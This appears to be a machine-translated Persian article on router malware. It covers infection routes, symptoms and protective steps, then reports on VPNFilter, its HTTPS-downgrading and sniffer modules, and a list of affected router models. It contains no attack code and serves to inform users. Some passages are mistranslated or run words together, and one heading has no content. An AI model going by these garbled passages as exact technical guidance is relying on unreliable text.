به نظر می رسد این است. هنگام مرور وب سایت ها، ناگهان صفحه ای باز می شود که از شما می خواهد فلش پلیر، جاوا، نصب را به روز کنید. آنتی ویروس رایگان، برنامه ای را دانلود کنید که ظاهراً برای افزایش سرعت و بهینه سازی رایانه شخصی شما یا هر چیز به ظاهر بی ضرر دیگری است. مهم است که نام یک سایت آشنا و قابل اعتماد ممکن است در نوار آدرس نمایش داده شود. اگر کاربر فایل پیشنهادی را دانلود و اجرا کند، به احتمال زیاد در آینده نزدیک تجربه خواهد کرد مشکلات بزرگاز کامپیوتر:

• ممکن است رایانه شما شروع به نمایش تبلیغات کند.
• ممکن است فایل ها رمزگذاری شوند.
• وقتی سعی می کنید هر وب سایتی را باز کنید، ممکن است درخواستی ظاهر شود.
• دسکتاپ ممکن است توسط Winlocker مسدود شود، دوباره با نیاز به انتقال پول برای باز کردن قفل.
• از رایانه می توان برای انجام حملات اینترنتی به وب سایت ها و سرورها، هک رایانه های دیگر (بات نت) و سایر موارد بد استفاده کرد.

در این مورد، به عنوان یک قاعده، عملکرد رایانه شخصی کاهش می یابد، تماس های مداوم وجود دارد هارد دیسک، استفاده از CPU در حالت غیرفعال به 100٪ می رسد.

چگونه روتر آلوده می شود؟

به عنوان یک قاعده، ابتدا یکی از کامپیوترهای موجود در شبکه محلی. هنگامی که فایلی را از اینترنت دانلود می کنید، ویروس وارد رایانه شما می شود. سپس، درخواست ها را به آدرس های استاندارد تجهیزات شبکه ارسال می کند و می تواند اسکن کند بیسکویت ها، بدافزار اضافی (تروجان) را دانلود کرده و در نتیجه وارد تنظیمات روتر یا مودم ADSL می شود.

ویروس ها و تروجان ها می توانند تنظیمات روتر (به ویژه تغییر DNS) را تغییر دهند اگر:

1. برای ورود به رابط وب استفاده کنید جزئیات استاندارد— IP، لاگین و رمز عبور (به عنوان مثال، 192.168.1.1، admin/admin)

2. آدرس، لاگین و رمز عبور روتر در مرورگر ذخیره می شود.

علائم عفونت روتر

(می تواند همه با هم یا علائم فردی رخ دهد)

1. تبلیغات در دستگاه‌های متصل به روتر ظاهر می‌شوند، برگه‌های سمت چپ/پنجره‌های پاپ‌آپ خود به خود در مرورگرها باز می‌شوند و ممکن است یک بنر باج‌افزار در کل صفحه نمایش داده شود.

2. برخی از سایت ها باز نمی شوند. در عوض، صفحات وب با محتوای عجیب و غریب یا خطای "404" نمایش داده می شود.

3. دسترسی به اینترنت وجود ندارد، اگرچه نشانگر WAN/Internet روشن است.

4. رایانه یک آدرس IP از محدوده 169.254.*.* دریافت می کند.

نحوه حذف ویروس از روتر

چگونه از روتر خود در برابر ویروس ها محافظت کنیم

1. سیستم عامل را به جدیدترین آپدیت کنید

به وب سایت سازنده بروید، مدل خود را وارد کنید و آخرین سیستم عامل را دانلود کنید. نمونه تجهیزات TP-Link را بخوانید.

2. یک رمز عبور غیر استاندارد برای رابط وب تعیین کنید

همه روترها به شما اجازه نمی دهند لاگین خود را تغییر دهید. اما اگر تنظیم کنید رمز عبور پیچیده، کافی خواهد بود.

3. دسترسی به رابط روتر از طریق اینترنت را ممنوع کنید

4. آدرس IP روتر را در شبکه محلی تغییر دهید

حتی شک نکنید که اولین کاری که یک ویروس سارق روتر انجام می دهد این است که با محبوب ترین آدرس ها تماس بگیرید: 192.168.0.1 و 192.168.1.1. بنابراین به شما توصیه می کنیم اکتت سوم و چهارم را تغییر دهید آدرس IP محلی V تنظیمات LAN. برای مثال مشخص کنید:

192.168.83.254

پس از این، تمام دستگاه های موجود در شبکه IP از محدوده 192.168.83 دریافت خواهند کرد.*

پس از تغییر IP محلی روتر، برای ورود به رابط وب باید http://[آدرس جدید] را وارد کنید.

5. یک آنتی ویروس قابل اعتماد بر روی کامپیوتر خود نصب کنید

حتی اگر بدافزار به رایانه شما نفوذ کند، خنثی می شود و زمانی برای آلوده کردن روتر نخواهد داشت.

6. رمزهای عبور را در مرورگر خود ذخیره نکنید

فکر می کنم بتوانید رمز عبور رابط وب روتر را به خاطر بسپارید. یا حداقل آن را روی کاغذ بنویسید.

با توجه به افزایش تعداد موارد تعویض DNS مخرب استبرنامه های موجود در دستگاه های کاربران اینترنت، این سوال پیش می آید امنیت وای فایروترها چگونه روتر خود را از نظر ویروس بررسی کنیم? نحوه حذف ویروس از روتر? سوال پیچیده و در عین حال ساده است. راه حلی وجود دارد!

خود ویروس به دلیل فضای کم در حافظه خود روتر نمی تواند خود را در اکثر روترهای مدرن ضبط کند، اما می تواند روتر را برای مشارکت در یک بات نت زامبی کند. به عنوان یک قاعده، این یک بات نت برای حمله به سرورهای مختلف، یا برای تغییر مسیر و تجزیه و تحلیل جریان اطلاعاتی است که شما را در اینترنت می‌گذارد.

رمز عبور و مکاتبات شخصی شما ممکن است به دست مهاجمان بیفتد!

این باید هرچه سریعتر برطرف شود.

• ریست کردن روتر
• سیستم عامل روتر
• بازنشانی

ریست کردن روتر

با فشار دادن دکمه ریست می توانید تنظیمات روتر را بازنشانی کنید. معمولا این دکمه در پشت روتر قرار دارد، جایی که پورت های LAN. معمولاً دکمه برای جلوگیری از فشار دادن تصادفی در یک سوراخ فرو رفته است، بنابراین باید از خلال دندان استفاده کنید. این تنظیمات روتر تغییر یافته توسط ویروس را حذف می کند و تنظیمات کارخانه را در جای خود نصب می کند. من باید به شما هشدار دهم که اگر نمی دانید چگونه یک روتر را پیکربندی کنید، پس تنظیم مجددتنظیمات آن برای شما ارزشش را ندارد!

سیستم عامل روتر

گاهی اوقات ویروس "سیل" می زند سیستم عامل اصلاح شدهبه روتر برای حذف سیستم عامل ویروس از روتر، می توانید دوباره روتر را فلش کنید.

کامپیوتر را با کابل LAN به روتر وصل کنید. کابل لنهمراه با هر روتر یا اگر اتصال کابلی امکان پذیر نیست از طریق Wi-Fi. بهتره با کابل وصل بشی! اتصال بیسیمناپایدار در نظر گرفته می شود و برای سیستم عامل روتر چشمک زن مناسب نیست.

پس از اتصال به روتر، مرورگر (Chrome، Opera، Mozilla، IE) را باز کرده و وارد شوید نوار آدرسنشانی روتر ایسوس، برای ایسوس 192.168.1.1 است، در صفحه ای که باز می شود باید لاگین و رمز عبور خود را وارد کنید تا وارد تنظیمات روتر شوید. ورود: admin، رمز عبور: admin. اگر لاگین و رمز عبور مطابقت ندارند، از شخصی که روتر را برای شما تنظیم کرده است بپرسید، شاید او آنها را تغییر داده است.

سفت‌افزار را از وب‌سایت سازنده دانلود کنید و با استفاده از صفحه تنظیمات روتر، میان‌افزار روی دیسک را انتخاب کنید. برای اکثریت قریب به اتفاق روترها، مراحل سیستم عامل یکسان است.

چند هفته پیش متخصصان امنیت اطلاعات، VPNFilter نامیده می شود. آنطور که مشخص شد، هدف اصلیاین بدافزار بیشترین روترها هستند تولید کنندگان مختلف. یکی از اولین کسانی که به VPNFilter توجه کرد تیمی از متخصصان امنیت اطلاعات از Cisco Talos بود.

این بدافزار دائماً توسط توسعه دهندگان خود بهبود می یابد. اخیرا کشف شده است ماژول جدیدکه از نوع حمله انسان در وسط علیه استفاده می کند ترافیک ورودی. مهاجمان می توانند ترافیک عبوری از روتر را تغییر دهند. آنها همچنین می توانند هر داده ای را بدون هیچ مشکلی به سرورهای خود هدایت کنند. ماژول ویروس ssler نام دارد.

علاوه بر اصلاح ترافیک ورودی، ssler می تواند اطلاعات شخصی قربانی را نیز به سازندگان خود منتقل کند. اینها می توانند رمز عبور باشند انواع مختلفمنابعی که مجرمان سایبری سپس برای مقاصد مختلف استفاده می کنند.

برای جلوگیری از سرقت اطلاعات شخصیمعمولاً از رمزگذاری TLS استفاده می شود که بدافزار می تواند از آن عبور کند. این کار با "تنزل" اتصالات HTTPS به ترافیک HTTP انجام می شود که توسط هیچ چیزی محافظت نمی شود. سپس سرصفحه‌های درخواست جایگزین می‌شوند و نشان می‌دهند که نقطه دسترسی آسیب‌پذیر است. اسلر به شکلی خاصترافیک منابع مختلف از جمله گوگل، فیس بوک، توییتر و یوتیوب را تغییر می دهد. واقعیت این است که این خدمات ارائه می کنند حفاظت اضافی. به مثال گوگلترافیک HTTP را به سرورهای HTTPS هدایت می کند. اما این ماژول به شما اجازه می دهد تا از این حفاظت عبور کنید تا مهاجمان ترافیک رمزگذاری نشده را دریافت کنند.

از زمان کشف این ویروس، متخصصان امنیت اطلاعات در حال بررسی قابلیت های آن بوده اند. حالا معلوم می شود که او خطرناکتر از آن چیزی است که تصور می شود. به عنوان مثال، قبلاً کارشناسان سیسکو این را استدلال می کردند وظیفه اصلیمزاحمان - عفونت دستگاه های شبکهدر دفاتر شرکت و خانه قربانیان. احتمالا برای تشکیل یک بات نت. اما اکنون مشخص شده است که این کاربران یا بهتر است بگوییم داده های آنها هستند که هدف اصلی هستند.

در ابتدا، زمانی که ویروس را کشف کردیم، معتقد بودیم که برای پیاده سازی انواع مختلف ایجاد شده است حملات شبکه. اما مشخص شد که این وظیفه و فرصت اصلی بدافزار نیست. این عمدتا برای سرقت اطلاعات کاربر و اصلاح ترافیک ایجاد شده است. به عنوان مثال، یک ویروس می تواند ترافیک را به گونه ای تغییر دهد که کاربر مشتری-بانک همان مقدار را در حساب خود ببیند. اما در واقع مدت‌هاست که پولی در آنجا وجود ندارد.» در گزارش کارشناسان امنیت سایبری آمده است.

جالب توجه است که بیشتر دستگاه های آلوده در اوکراین قرار دارند. اقدامات امنیتی مانند HTTP Strict Transport Security در اینجا بسیار رایج نیستند، بنابراین داده های کاربر در معرض خطر هستند. اما در کشورهای دیگر نیز مشکلاتی وجود دارد - به عنوان مثال، در ایالات متحده آمریکا و اروپای غربی، بسیاری از دستگاه های منسوخ از کار با HTTPS پشتیبانی نمی کنند و همچنان از HTTP استفاده می کنند.

پیش از این گزارش شده بود که آسیب‌پذیرترین مدل‌های روتر برای این ویروس، دستگاه‌های تولید شده توسط ASUS، D-Link، Huawei، Ubiquiti، UPVEL و ZTE هستند. در واقع، دامنه دستگاه های آسیب پذیر در برابر ویروس بسیار گسترده تر است. این شامل مدل هایی از Linksys، MikroTik، Netgear و TP-Link می شود.

لیست کاملدستگاه های آسیب پذیر

ایسوس:
RT-AC66U (جدید)
RT-N10 (جدید)
RT-N10E (جدید)
RT-N10U (جدید)
RT-N56U (جدید)
RT-N66U (جدید)

دی لینک:
DES-1210-08P (جدید)
DIR-300 (جدید)
DIR-300A (جدید)
DSR-250N (جدید)
DSR-500N (جدید)
DSR-1000 (جدید)
DSR-1000N (جدید)

هواوی:
HG8245 (جدید)

لینکسیس:
E1200
E2500
E3000 (جدید)
E3200 (جدید)
E4200 (جدید)
RV082 (جدید)
WRVS4400N

میکروتیک:
CCR1009 (جدید)
CCR1016
CCR1036
CCR1072
CRS109 (جدید)
CRS112 (جدید)
CRS125 (جدید)
RB411 (جدید)
RB450 (جدید)
RB750 (جدید)
RB911 (جدید)
RB921 (جدید)
RB941 (جدید)
RB951 (جدید)
RB952 (جدید)
RB960 (جدید)
RB962 (جدید)
RB1100 (جدید)
RB1200 (جدید)
RB2011 (جدید)
RB3011 (جدید)
RB Groove (جدید)
RB Omnitik (جدید)
STX5 (جدید)

Netgear:
DG834 (جدید)
DGN1000 (جدید)
DGN2200
DGN3500 (جدید)
FVS318N (جدید)
MBRN3000 (جدید)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (جدید)
WNR4000 (جدید)
WNDR3700 (جدید)
WNDR4000 (جدید)
WNDR4300 (جدید)
WNDR4300-TN (جدید)
UTM50 (جدید)

QNAP:
TS251
TS439 Pro
سایر NAS های QNAP با QTS

تی پی لینک:
R600VPN
TL-WR741ND (جدید)
TL-WR841N (جدید)

Ubiquiti:
NSM2 (جدید)
PBE M5 (جدید)

سطح بالا:
مدل های ناشناخته* (جدید)

ZTE:
ZXHN H108N (جدید)

و این همه ماجرا نیست

علاوه بر تمام موارد ذکر شده در بالا، Talos از کشف یک ماژول sniffer خبر داد. ترافیک را در جستجوی داده تجزیه و تحلیل می کند نوع خاصی، که مربوط به عملکرد سیستم های صنعتی می باشد. این ترافیک از طریق TP-Link R600 عبور می کند که توسط ماژول تعیین می شود. علاوه بر این، ماژول به دنبال دسترسی های IP از یک محدوده خاص و همچنین بسته های داده ای است که اندازه آنها 150 بایت یا بیشتر است.

سازندگان ویروس به دنبال چیزهای بسیار خاصی هستند. آنها سعی نمی کنند تا حد امکان جمع آوری کنند اطلاعات موجود، اصلا. آنها به رمز عبور، لاگین، دسترسی به محدوده IP خاص و مواردی از این دست نیاز دارند. محققان می گویند که ما در تلاشیم تا بفهمیم چه کسی ممکن است به این همه نیاز داشته باشد.

اما این همه چیز نیست، زیرا اکنون ویروس در حال به روز رسانی است و یک ماژول خود تخریبی در عملکرد آن ظاهر شده است. هنگامی که ماژول فعال می شود، ویروس بدون هیچ اثری از دستگاه حذف می شود.

با وجود اینکه حدود یک هفته پیش FBI کشف و ضبط کرد سرور اصلی، بات نت هنوز فعال است، اقدامات انجام شدهمعلوم شد که کافی نیست.